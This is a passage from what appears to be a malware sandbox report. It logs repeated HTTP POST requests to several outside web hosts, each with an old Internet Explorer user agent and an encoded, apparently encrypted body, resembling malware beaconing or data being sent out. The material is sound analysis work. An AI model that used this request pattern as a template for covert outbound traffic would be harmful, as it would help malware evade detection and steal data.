4d 59 79 67 76 69 48 79 6b 38 49 79 4f 2b 71 32 62 49 2f 4a 4e 48 33 2b 6b 49 76 6f 6d 2b 79 75 7a 30 37 35 48 65 36 61 58 6b 62 2f 57 49 3d Data Ascii: Uitjq82Wf2nL9v5RREkEKIZglC471mhYURw1Ce/Gv3jwAcuTXOb5yLk+nyNEpdcnX7h2dkk2ZD33L1diYG9oqH0RylLFT+j+HCBbS0mOXGV9DjiVT8Tam+psGGc97vehp3ZQ5aueXQGoSzUS1XmjnrigII/1RTCrM2HL2vLVSWQxDcG4aPokifikJaaZvS9obGc+pdsZStm2592e7um6d1i8bbT0AHRUCvVpqmbWci5jAf0bFRf2Y3ua/99Vga24pg/p5NLSUR+Vs4Uq5HO2o+IeEBCOUIOe5cP+91Fr91SAfbdcGW4RI/5Xly0B0qnuDFO9ZLchc6aBgcWyJM3XzrRUbLkLcrYIrfkstM7WTE3B6xrXpnLmig0hdxxs15wHZQRye80YrN0cAefN+skJEiQbhpkQIxMehfQ0ziygRXL5N/zgHdb9faiq++3oxfisOQ+jSEgnNnR8Jpz7SHfbmdYMr+rdVkDk9JjHbz7fA8M71ZtS2b0ROwT0nvuxBLq5JlvUiMYygviHyk8IyO+q2bI/JNH3+kIvom+yuz075He6aXkb/WI=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 30 6b 2b 72 48 42 43 6b 63 6d 6d 41 6a 6c 53 76 6f 36 67 76 53 73 4d 31 64 47 6f 34 66 48 39 6b 52 42 53 43 38 73 6e 61 77 2b 4a 34 4a 65 66 42 72 47 53 6f 57 76 76 4d 39 71 38 73 51 4f 48 39 74 45 61 47 62 55 6d 44 6f 59 73 4d 53 42 44 30 45 73 44 57 72 6f 31 2b 63 79 75 70 42 2f 48 77 72 70 49 7a 63 74 43 74 46 6d 51 44 78 6b 33 36 38 62 6e 72 43 30 78 4e 73 6a 6a 73 33 4f 4c 70 6d 75 2b 2f 76 48 65 69 55 42 31 77 44 53 72 35 34 4a 4b 30 74 44 48 41 55 5a 4a 32 4c 31 37 73 79 6d 4a 77 66 63 69 62 30 6d 4b 48 64 45 63 46 31 49 4f 68 61 34 58 6c 61 44 75 63 74 77 62 37 72 72 46 66 58 37 77 43 58 30 7a 41 69 4f 55 44 41 54 68 43 58 33 65 51 45 75 33 6b 4c 71 4d 71 72 4d 64 56 49 5a 59 49 33 38 4d 77 4c 6d 42 77 61 66 66 47 6d 52 58 76 33 42 6c 68 78 71 56 33 49 77 53 46 36 67 69 66 72 4d 4b 78 73 2b 73 4e 6b 6f 56 4c 41 6e 77 53 74 2f 33 53 5a 5a 4e 52 61 2b 6f 35 43 78 71 72 35 2b 74 54 57 67 4b 67 69 6d 38 78 58 36 31 51 43 61 53 62 62 41 41 65 4a 64 41 73 4f 68 73 55 6e 6c 6c 55 77 4c 4d 51 7a 70 59 4f 67 61 68 66 66 79 58 48 66 52 34 69 74 73 6d 5a 6e 67 4e 6b 62 4a 6b 32 5a 48 76 57 33 45 6b 58 78 77 4e 31 34 74 4c 73 70 4c 69 4e 59 51 57 49 36 55 4d 56 31 2f 38 41 6e 4f 34 58 69 2f 42 49 4f 45 4e 2b 33 41 4e 51 41 35 39 47 62 78 38 70 34 77 73 48 59 39 66 6c 68 76 67 6f 42 6f 6e 53 71 2b 37 53 78 4c 56 57 65 30 2f 61 77 64 73 43 41 44 6d 46 62 4f 72 62 48 75 64 6b 31 4c 51 66 6e 6f 37 35 57 51 35 33 67 51 59 4f 31 7a 34 52 42 6e 57 6a 42 52 4c 54 62 47 59 64 39 63 70 76 72 74 7a 41 6b 30 77 50 70 33 52 44 31 70 70 43 66 6b 63 37 71 75 38 4f 59 37 49 4d 71 75 79 65 68 53 72 2b 55 62 47 7a 64 73 30 6e 41 32 41 6d 6e 77 62 75 38 55 45 50 65 54 58 74 66 59 4d 51 6e 4a 55 6b 39 33 34 6a 37 36 31 6f 4c 4a 62 44 31 6b 4e 61 48 7a 38 42 50 65 38 3d Data Ascii: 0k+rHBCkcmmAjlSvo6gvSsM1dGo4fH9kRBSC8snaw+J4JefBrGSoWvvM9q8sQOH9tEaGbUmDoYsMSBD0EsDWro1+cyupB/HwrpIzctCtFmQDxk368bnrC0xNsjjs3OLpmu+/vHeiUB1wDSr54JK0tDHAUZJ2L17symJwfcib0mKHdEcF1IOha4XlaDuctwb7rrFfX7wCX0zAiOUDAThCX3eQEu3kLqMqrMdVIZYI38MwLmBwaffGmRXv3BlhxqV3IwSF6gifrMKxs+sNkoVLAnwSt/3SZZNRa+o5Cxqr5+tTWgKgim8xX61QCaSbbAAeJdAsOhsUnllUwLMQzpYOgahffyXHfR4itsmZngNkbJk2ZHvW3EkXxwN14tLspLiNYQWI6UMV1/8AnO4Xi/BIOEN+3ANQA59Gbx8p4wsHY9flhvgoBonSq+7SxLVWe0/awdsCADmFbOrbHudk1LQfno75WQ53gQYO1z4RBnWjBRLTbGYd9cpvrtzAk0wPp3RD1ppCfkc7qu8OY7IMquyehSr+UbGzds0nA2Amnwbu8UEPeTXtfYMQnJUk934j761oLJbD1kNaHz8BPe8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 43 37 6f 50 64 46 46 72 6a 6d 6b 34 43 39 4e 44 38 4b 78 56 30 71 6f 66 6e 75 55 50 2f 2f 76 4b 46 5a 66 44 69 54 64 41 2f 35 6e 51 31 7a 70 41 52 4f 34 52 6a 61 78 51 4b 78 2b 58 71 69 65 74 2b 2b 6a 48 6e 51 66 4c 6c 77 5a 51 49 5a 70 79 48 6b 44 78 76 37 30 2f 72 48 73 61 71 6b 53 37 5a 52 32 65 4e 33 6d 45 41 78 70 6b 36 43 75 51 76 6d 39 47 6b 75 62 61 2b 38 61 77 71 45 6a 39 4e 68 56 6d 73 63 36 41 61 57 6c 56 45 6b 50 49 4e 39 55 46 45 64 7a 62 32 41 65 4e 64 6b 38 46 65 4e 67 72 47 74 4c 6d 31 57 52 31 30 6a 50 55 6c 35 31 35 64 47 45 4d 79 4a 74 4d 50 74 59 71 79 76 4b 57 71 5a 69 53 76 6a 54 49 56 71 52 5a 61 56 6c 75 2b 46 46 4f 59 48 4a 39 56 39 65 31 70 44 37 69 6c 4e 4f 65 33 76 4d 67 50 6a 62 34 77 37 73 67 4d 35 33 74 4e 30 74 59 2b 69 79 42 32 68 34 68 53 65 68 6c 4e 6e 52 30 67 59 46 7a 77 41 44 39 35 59 2f 6d 6a 61 76 71 44 77 69 43 68 32 43 67 48 4a 6f 6a 4b 62 51 7a 78 55 68 47 50 4b 32 77 71 7a 68 38 69 54 5a 75 51 64 4f 36 59 34 72 37 51 4a 4b 72 61 37 4b 47 63 44 73 59 59 4c 2b 47 52 56 36 31 71 30 73 4e 6a 6c 52 36 75 4c 42 64 53 33 42 71 78 63 6b 6c 68 50 76 61 33 6a 36 4b 4a 77 71 34 4a 65 65 71 4b 65 71 65 79 52 37 79 6b 76 6d 77 6d 49 66 78 69 79 69 50 4c 53 74 42 6e 76 75 61 74 6c 36 73 79 50 74 48 43 36 55 76 33 64 64 73 71 70 6e 51 44 2b 74 6f 5a 74 43 4a 56 39 73 58 61 48 70 53 38 36 70 4b 55 38 79 46 4e 48 59 55 34 49 72 31 49 7a 44 33 64 55 54 4b 49 2b 57 68 5a 50 52 78 30 69 62 35 41 78 66 6b 6f 41 4b 64 38 6c 6e 66 67 45 56 59 4c 70 73 47 69 69 55 42 4d 6e 6c 76 32 39 57 2b 72 79 6d 51 46 31 75 31 42 74 33 34 34 36 74 48 75 5a 4e 5a 33 7a 61 5a 45 67 2f 2f 36 58 34 79 4e 62 4d 3d Data Ascii: C7oPdFFrjmk4C9ND8KxV0qofnuUP//vKFZfDiTdA/5nQ1zpARO4RjaxQKx+Xqiet++jHnQfLlwZQIZpyHkDxv70/rHsaqkS7ZR2eN3mEAxpk6CuQvm9Gkuba+8awqEj9NhVmsc6AaWlVEkPIN9UFEdzb2AeNdk8FeNgrGtLm1WR10jPUl515dGEMyJtMPtYqyvKWqZiSvjTIVqRZaVlu+FFOYHJ9V9e1pD7ilNOe3vMgPjb4w7sgM53tN0tY+iyB2h4hSehlNnR0gYFzwAD95Y/mjavqDwiCh2CgHJojKbQzxUhGPK2wqzh8iTZuQdO6Y4r7QJKra7KGcDsYYL+GRV61q0sNjlR6uLBdS3BqxcklhPva3j6KJwq4JeeqKeqeyR7ykvmwmIfxiyiPLStBnvuatl6syPtHC6Uv3ddsqpnQD+toZtCJV9sXaHpS86pKU8yFNHYU4Ir1IzD3dUTKI+WhZPRx0ib5AxfkoAKd8lnfgEVYLpsGiiUBMnlv29W+rymQF1u1Bt3446tHuZNZ3zaZEg//6X4yNbM=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWkJxSFk2RFVZU1VtUjRLSTBoQkxTd0FBQUEwIiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaQnFIWTZEVVlTVW1SNEtJMGhCTFN3QUFBQTAiLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjU0MCIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiMTAyLjEyOS4xNDMuNzgiLCJSRVFVRVNUX1NDSEVNRSI6Imh0dHAiLCJDT05URVhUX1BSRUZJWCI6Ilwvc3lzdGVtLWJpblwvIiwiQ09OVEVYVF9ET0NVTUVOVF9ST09UIjoiXC9rdW5kZW5cL3VzclwvbGliXC9jZ2ktYmluXC8iLCJSRU1PVEVfUE9SVCI6IjYyNDcyIiwiUkVESVJFQ1RfVVJMIjoiXC9pbmRleC5waHAiLCJSRVFVRVNUX01FVEhPRCI6IlBPU1QiLCJRVUVSWV9TVFJJTkciOiIiLCJTQ1JJUFRfTkFNRSI6IlwvaW5kZXgucGhwIiwiU1RBVFVTIjoiMjAwIiwiT1JJR19QQVRIX0lORk8iOiJcL2luZGV4LnBocCIsIk9SSUdfUEFUSF9UUkFOU0xBVEVEIjoiXC9rdW5kZW5cL2hvbWVwYWdlc1wvOVwvZDMyODE1MTg0N1wvaHRkb2NzXC9jbGlja2FuZGJ1aWxkc1wvbXlyb3BjYlwvaW5kZXgucGhwIiwiUEhQX1NFTEYiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfVElNRV9GTE9BVCI6MTY3OTQ2MDE5NS4wNzg4MzIsIlJFUVVFU1RfVElNRSI6MTY3OTQ2MDE5NSwiYXJndiI6W10sImFyZ2MiOjB9; myro_ct=eyJ0eXBlIjoiZGlyZWN0IiwidmFsdWUiOiIxMDIuMTI5LjE0My43OCIsInVybCI6bnVsbCwiaXAiOiIxMDIuMTI5LjE0My43OCJ9; shield-notbot-nonce=0f30939aff
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 79 37 42 6e 2b 50 46 45 4e 32 6d 73 70 6c 58 6d 45 48 6b 2b 56 55 70 4b 53 31 55 76 36 57 4b 66 74 58 4a 6c 4d 59 74 2b 5a 58 2f 73 4c 4b 56 4b 37 56 42 4d 6d 61 42 52 5a 63 4d 4f 4b 55 59 48 71 54 69 44 6e 47 65 4f 4f 38 6e 78 64 6f 6d 31 35 6c 34 58 64 30 5a 6f 6c 4a 47 79 74 75 50 63 61 56 56 4e 6c 67 56 58 43 57 64 4d 35 6a 31 75 6b 46 4b 5a 77 2b 6c 2b 56 37 41 78 71 4f 48 75 43 71 42 30 52 48 46 61 54 57 37 6c 70 34 61 47 2b 32 52 53 76 58 6a 42 4f 6e 68 61 54 6c 4c 69 77 4c 74 6c 39 37 64 4d 31 55 46 66 65 78 31 34 6e 43 34 6c 48 51 37 69 51 37 4d 30 31 73 69 2b 46 6d 36 61 4a 4c 41 66 51 54 42 48 4c 47 2f 48 78 68 78 45 52 33 62 34 6c 6f 73 78 66 55 43 62 75 71 4c 48 6d 71 62 58 69 44 74 48 46 47 44 65 57 2f 36 4c 50 55 64 2f 53 42 68 4f 47 39 58 4a 42 63 35 77 4d 6e 64 74 63 63 57 51 2f 4d 2f 64 72 5a 44 4c 34 44 69 75 64 37 53 50 4a 71 67 30 78 4f 6d 4b 32 65 73 39 4f 37 38 6b 4c 73 64 43 7a 65 4f 69 70 61 45 57 74 41 38 72 38 74 2b 67 6c 77 2b 51 34 47 2b 42 31 34 63 6d 46 37 46 52 6c 7a 6c 5a 7a 37 37 36 32 48 44 74 65 59 61 58 5a 53 4a 68 39 69 35 74 61 57 6a 4c 34 6a 61 38 36 6c 51 72 4f 52 4f 66 38 59 31 6e 65 4b 39 55 58 35 51 68 62 78 55 49 56 52 44 54 38 6c 55 5a 71 38 65 46 63 73 4a 72 5a 6e 35 4f 2b 48 2b 76 34 65 47 69 72 76 79 71 68 4c 4a 53 71 39 73 2f 47 2f 4d 35 2b 55 4a 54 4d 78 37 73 4e 51 66 70 76 6f 4e 6c 6c 63 57 6a 53 6f 55 74 44 64 77 79 2b 6b 6d 57 78 7a 50 46 52 54 36 51 30 75 6e 64 33 57 7a 50 39 32 74 57 53 6d 47 39 7a 49 6d 42 32 56 78 45 4e 6c 72 44 73 38 5a 58 64 6c 51 67 4d 4e 66 6b 44 59 6d 73 4b 30 38 31 38 6c 76 72 75 4d 55 2b 72 54 31 49 35 33 34 7a 62 41 35 63 34 56 35 6a 65 72 6f 45 38 68 45 3d Data Ascii: y7Bn+PFEN2msplXmEHk+VUpKS1Uv6WKftXJlMYt+ZX/sLKVK7VBMmaBRZcMOKUYHqTiDnGeOO8nxdom15l4Xd0ZolJGytuPcaVVNlgVXCWdM5j1ukFKZw+l+V7AxqOHuCqB0RHFaTW7lp4aG+2RSvXjBOnhaTlLiwLtl97dM1UFfex14nC4lHQ7iQ7M01si+Fm6aJLAfQTBHLG/HxhxER3b4losxfUCbuqLHmqbXiDtHFGDeW/6LPUd/SBhOG9XJBc5wMndtccWQ/M/drZDL4Diud7SPJqg0xOmK2es9O78kLsdCzeOipaEWtA8r8t+glw+Q4G+B14cmF7FRlzlZz7762HDteYaXZSJh9i5taWjL4ja86lQrOROf8Y1neK9UX5QhbxUIVRDT8lUZq8eFcsJrZn5O+H+v4eGirvyqhLJSq9s/G/M5+UJTMx7sNQfpvoNllcWjSoUtDdwy+kmWxzPFRT6Q0und3WzP92tWSmG9zImB2VxENlrDs8ZXdlQgMNfkDYmsK0818lvruMU+rT1I534zbA5c4V5jeroE8hE=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pupi.czCache-Control: no-cacheCookie: __tad=1679460200.7521904Data Raw: 4a 33 53 51 2f 4e 37 4b 71 32 6e 76 6d 4b 39 69 4b 62 53 71 33 4d 48 66 4d 42 6b 65 33 67 53 6b 38 69 68 44 4f 75 79 78 6e 54 47 70 45 49 38 53 58 76 4f 7a 34 76 2f 74 68 54 4c 39 2f 4b 76 7a 51 6d 6b 6f 77 47 54 6e 44 69 39 6e 6f 72 4b 34 62 4b 4b 77 4e 67 45 72 6e 79 36 58 56 39 79 4d 78 4e 4e 72 2b 50 31 56 34 4b 66 6c 66 45 68 72 62 7a 37 7a 2b 59 49 6c 51 61 57 67 33 73 31 36 7a 72 34 61 6c 4c 4e 42 36 39 71 71 36 7a 67 46 63 64 50 67 63 72 34 57 4d 67 6f 4d 6b 39 4b 45 72 46 61 71 6b 41 4b 32 36 41 41 57 70 64 4f 48 43 57 34 4a 4a 62 57 34 7a 4b 43 79 62 72 48 52 63 66 33 61 6a 73 6e 4c 72 50 56 49 55 2b 33 43 72 43 34 37 73 57 41 77 73 6b 44 67 6d 79 75 61 32 4e 5a 2f 66 4f 4d 41 78 56 68 45 42 61 38 43 48 50 67 76 6c 6d 59 2f 74 73 6b 79 47 39 68 66 47 6f 66 59 39 41 42 2b 70 73 4b 34 2b 76 44 34 6c 7a 34 73 75 73 47 36 64 64 72 57 7a 7a 44 5a 4b 50 74 64 6d 51 66 36 36 78 54 31 4b 6d 49 45 6a 33 62 6c 76 50 68 6b 68 74 49 56 5a 38 68 2b 56 45 54 34 71 38 37 2b 72 7a 54 31 75 52 77 34 53 56 31 67 4d 34 65 66 41 5a 36 70 38 6f 76 67 52 4a 69 73 47 30 2b 53 56 66 41 76 2f 6b 54 2b 48 35 51 6e 56 78 39 62 45 51 68 70 35 37 2f 2f 57 6a 62 6f 5a 6c 62 55 35 34 4a 41 39 6d 65 6b 46 43 32 49 54 48 46 66 69 6d 59 2b 35 48 36 46 6f 68 47 42 39 5a 41 2b 57 38 70 75 68 49 4c 38 44 77 33 64 36 69 5a 6a 4f 33 79 6d 56 49 67 65 33 4c 76 43 4c 67 33 46 63 4d 61 69 52 76 31 30 32 6e 38 5a 34 31 71 57 4c 30 5a 46 74 71 4e 44 77 70 77 77 73 76 68 35 70 38 30 46 64 69 30 66 68 4b 57 31 70 55 52 6e 72 66 72 70 6c 4c 43 55 69 30 6e 57 78 36 5a 50 66 45 62 6d 46 53 39 45 4e 57 53 32 35 54 77 2b 2f 4d 49 65 56 44 48 5a 55 53 4b 6d 30 2f 6b 61 47 43 6a 76 7a 79 65 76 53 38 50 6b 4a 69 37 64 70 62 78 47 67 77 4a 79 33 69 50 57 43 42 56 37 78 67 3d 3d Data Ascii: J3SQ/N7Kq2nvmK9iKbSq3MHfMBke3gSk8ihDOuyxnTGpEI8SXvOz4v/thTL9/KvzQmkowGTnDi9norK4bKKwNgErny6XV9yMxNNr+P1V4KflfEhrbz7z+YIlQaWg3s16zr4alLNB69qq6zgFcdPgcr4WMgoMk9KErFaqkAK26AAWpdOHCW4JJbW4zKCybrHRcf3ajsnLrPVIU+3CrC47sWAwskDgmyua2NZ/fOMAxVhEBa8CHPgvlmY/tskyG9hfGofY9AB+psK4+vD4lz4susG6ddrWzzDZKPtdmQf66xT1KmIEj3blvPhkhtIVZ8h+VET4q87+rzT1uRw4SV1gM4efAZ6p8ovgRJisG0+SVfAv/kT+H5QnVx9bEQhp57//WjboZlbU54JA9mekFC2ITHFfimY+5H6FohGB9ZA+W8puhIL8Dw3d6iZjO3ymVIge3LvCLg3FcMaiRv102n8Z41qWL0ZFtqNDwpwwsvh5p80Fdi0fhKW1pURnrfrplLCUi0nWx6ZPfEbmFS9ENWS25Tw+/MIeVDHZUSKm0/kaGCjvzyevS8PkJi7dpbxGgwJy3iPWCBV7xg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 34 41 37 43 39 35 49 2f 4e 32 6d 61 59 31 7a 4d 52 56 6e 54 7a 4a 57 61 6b 5a 33 69 77 68 49 6d 35 72 61 6a 53 37 51 6b 33 78 59 67 2f 58 2f 6b 35 48 48 76 77 6c 4d 32 39 73 34 43 43 77 61 59 37 4d 69 43 49 45 39 64 75 4b 33 42 51 37 67 39 46 6d 39 47 63 6f 55 74 6c 49 43 73 74 32 46 2b 77 50 46 38 4b 2b 42 38 52 55 45 77 53 4c 74 57 72 67 57 7a 42 6e 79 7a 6c 48 33 32 62 66 4f 6a 30 61 5a 32 35 71 62 71 79 41 54 74 35 36 59 57 66 61 2f 44 76 44 47 56 77 66 38 69 55 6f 42 67 35 38 48 4f 63 6e 33 67 6e 50 62 41 6c 35 58 50 32 48 51 35 39 64 2b 4d 72 42 59 43 77 44 76 72 62 32 45 30 51 47 74 77 30 7a 32 65 57 4b 6d 50 79 32 6d 35 57 39 48 37 59 41 33 4c 35 66 63 2f 36 6b 57 37 69 6a 4f 6a 39 50 7a 35 53 49 51 6f 52 53 42 7a 41 53 62 77 34 67 79 5a 77 78 6d 41 55 59 30 62 2b 65 72 66 44 76 2f 53 58 37 75 45 46 6b 52 77 70 48 6f 4f 2b 77 44 4f 47 73 6f 68 34 62 69 6e 6e 72 77 35 50 36 2f 66 78 4f 50 76 58 50 6e 59 4f 4c 33 6f 63 71 4a 74 63 66 6f 4b 31 58 4f 61 62 59 7a 2b 78 6e 7a 6a 6d 6d 4e 39 65 63 66 30 4b 76 6e 68 75 65 75 32 4e 59 7a 70 41 72 59 61 34 37 61 64 34 4c 39 64 36 46 70 68 64 2f 34 75 32 35 41 38 33 41 31 63 32 55 47 65 2b 62 51 4a 49 2f 42 2b 4e 4f 31 51 67 2f 73 64 42 59 68 69 47 64 38 50 71 44 76 51 45 48 2b 4a 58 59 6f 32 78 7a 30 4a 54 4a 42 41 6f 4a 69 35 52 5a 62 2b 45 66 6b 78 4b 41 44 32 65 64 38 4b 39 63 45 32 38 4c 56 72 6d 4f 54 6d 6d 75 50 49 49 78 56 76 51 6d 54 35 31 36 6b 34 5a 4d 4d 52 4b 77 76 65 47 37 6b 68 34 7a 45 41 59 55 66 61 4c 75 62 7a 33 31 5a 70 61 68 58 54 43 4a 67 69 45 36 41 51 56 5a 57 6e 4e 4d 33 6a 55 59 58 7a 63 63 59 45 4d 43 72 67 75 48 4d 32 45 47 46 6b 64 4a 76 75 4d 39 73 4a 4e 36 37 66 Data Ascii: 4A7C95I/N2maY1zMRVnTzJWakZ3iwhIm5rajS7Qk3xYg/X/k5HHvwlM29s4CCwaY7MiCIE9duK3BQ7g9Fm9GcoUtlICst2F+wPF8K+B8RUEwSLtWrgWzBnyzlH32bfOj0aZ25qbqyATt56YWfa/DvDGVwf8iUoBg58HOcn3gnPbAl5XP2HQ59d+MrBYCwDvrb2E0QGtw0z2eWKmPy2m5W9H7YA3L5fc/6kW7ijOj9Pz5SIQoRSBzASbw4gyZwxmAUY0b+erfDv/SX7uEFkRwpHoO+wDOGsoh4binnrw5P6/fxOPvXPnYOL3ocqJtcfoK1XOabYz+xnzjmmN9ecf0Kvnhueu2NYzpArYa47ad4L9d6Fphd/4u25A83A1c2UGe+bQJI/B+NO1Qg/sdBYhiGd8PqDvQEH+JXYo2xz0JTJBAoJi5RZb+EfkxKAD2ed8K9cE28LVrmOTmmuPIIxVvQmT516k4ZMMRKwveG7kh4zEAYUfaLubz31ZpahXTCJgiE6AQVZWnNM3jUYXzccYEMCrguHM2EGFkdJvuM9sJN67f
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yoruksut.comCache-Control: no-cacheData Raw: 31 33 33 54 57 65 48 43 78 32 6d 56 65 38 44 6a 51 48 34 79 4f 37 71 70 63 4c 37 66 52 64 65 52 70 52 39 51 32 37 31 43 6c 58 75 50 58 59 6f 34 4c 31 47 49 72 7a 41 66 48 54 7a 38 62 50 68 43 2b 52 56 55 47 33 43 6a 4e 6e 39 70 64 49 30 7a 62 69 4a 37 74 44 74 34 4f 71 51 4a 65 6c 59 51 42 4f 6d 39 6e 74 70 66 71 7a 77 38 36 52 74 4c 76 75 6b 77 50 74 46 70 58 77 65 41 38 2f 70 68 6c 46 47 4b 2b 57 68 4b 36 48 79 71 7a 4d 30 73 65 33 38 4b 6b 70 33 6e 69 76 68 47 4c 4c 53 67 55 37 48 4f 67 44 46 78 67 4f 4f 31 62 37 47 31 5a 66 69 49 4f 57 44 44 41 77 58 6d 6a 79 73 57 35 67 4f 54 4d 35 53 62 2f 5a 67 44 55 49 67 35 33 4a 52 75 50 61 32 6b 62 4c 4a 67 56 6e 38 78 71 5a 79 6d 53 67 55 30 2b 68 72 47 6b 44 50 61 6b 6b 59 4f 6d 6e 39 57 66 4d 74 43 78 30 51 4a 36 6f 4c 45 66 52 73 73 7a 61 33 71 30 38 76 4b 4f 4b 65 5a 7a 54 32 70 59 55 51 64 78 72 55 47 36 44 54 65 68 73 30 6c 76 34 74 4d 35 52 4c 4a 6b 53 6a 58 4b 48 76 4b 32 59 30 2b 73 65 33 48 59 53 7a 4f 7a 69 4d 41 5a 76 6e 4f 77 70 4a 6f 36 57 57 36 5a 61 70 67 6d 4d 65 36 32 72 2f 66 75 46 33 43 6f 4a 51 54 42 55 78 66 52 65 4b 41 73 79 75 4e 79 7a 6f 51 35 43 2f 74 79 56 51 55 6f 59 4b 6d 76 2b 33 48 36 38 4f 57 55 61 78 77 62 69 43 70 6a 4a 5a 38 4d 51 63 4c 79 78 53 77 52 61 74 36 72 7a 79 71 6d 41 59 34 46 6c 6a 37 55 79 58 77 55 65 4c 46 6d 50 47 77 74 72 65 47 38 63 4c 59 69 69 6a 74 76 32 65 58 71 35 31 61 78 79 46 31 45 52 59 38 71 38 74 7a 53 36 79 38 52 63 44 4e 58 53 68 4e 6a 6c 6b 6a 65 4a 32 39 48 4b 31 72 54 32 6f 46 2b 43 35 45 48 46 6f 61 46 53 6f 74 73 68 67 62 6b 51 65 59 59 66 64 33 57 76 6e 48 46 56 5a 77 63 77 58 70 67 4e 71 68 4b 7a 76 59 5a 44 6b 6d 79 72 67 49 6f 4a 33 45 66 4a 64 43 77 4a 79 30 77 63 56 79 6e 59 4b 4a 6d 4d 59 59 71 67 31 77 Data Ascii: 133TWeHCx2mVe8DjQH4yO7qpcL7fRdeRpR9Q271ClXuPXYo4L1GIrzAfHTz8bPhC+RVUG3CjNn9pdI0zbiJ7tDt4OqQJelYQBOm9ntpfqzw86RtLvukwPtFpXweA8/phlFGK+WhK6HyqzM0se38Kkp3nivhGLLSgU7HOgDFxgOO1b7G1ZfiIOWDDAwXmjysW5gOTM5Sb/ZgDUIg53JRuPa2kbLJgVn8xqZymSgU0+hrGkDPakkYOmn9WfMtCx0QJ6oLEfRssza3q08vKOKeZzT2pYUQdxrUG6DTehs0lv4tM5RLJkSjXKHvK2Y0+se3HYSzOziMAZvnOwpJo6WW6ZapgmMe62r/fuF3CoJQTBUxfReKAsyuNyzoQ5C/tyVQUoYKmv+3H68OWUaxwbiCpjJZ8MQcLyxSwRat6rzyqmAY4Flj7UyXwUeLFmPGwtreG8cLYiijtv2eXq51axyF1ERY8q8tzS6y8RcDNXShNjlkjeJ29HK1rT2oF+C5EHFoaFSotshgbkQeYYfd3WvnHFVZwcwXpgNqhKzvYZDkmyrgIoJ3EfJdCwJy0wcVynYKJmMYYqg1w
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 74 4e 54 47 7a 64 75 47 79 32 6b 55 69 61 42 32 38 67 37 6a 33 73 54 68 43 6e 42 68 61 76 71 42 50 2f 5a 7a 72 6c 41 35 52 4d 43 6d 4a 70 63 6c 46 39 50 77 6c 5a 79 4e 65 47 53 62 44 53 2b 73 51 63 4c 77 64 59 56 52 2f 41 34 46 6f 46 54 51 31 56 6c 6e 41 63 65 51 58 67 6a 45 6a 52 66 7a 52 2f 52 31 31 6d 59 49 73 61 75 7a 76 73 70 5a 36 34 49 44 74 52 71 39 72 43 48 79 56 71 46 6a 46 64 61 45 36 2b 5a 42 53 55 6d 57 46 6a 76 6e 6f 42 5a 41 53 78 6b 31 78 5a 61 73 31 71 33 2b 72 57 56 49 39 34 77 2f 63 4d 78 6f 44 61 72 69 31 61 74 66 2b 68 4c 70 43 7a 34 64 4a 32 62 65 41 42 32 78 58 73 41 78 39 45 4e 62 35 58 4a 4c 56 63 33 6b 52 67 75 73 6c 61 37 65 77 50 4b 35 6e 5a 53 69 68 44 56 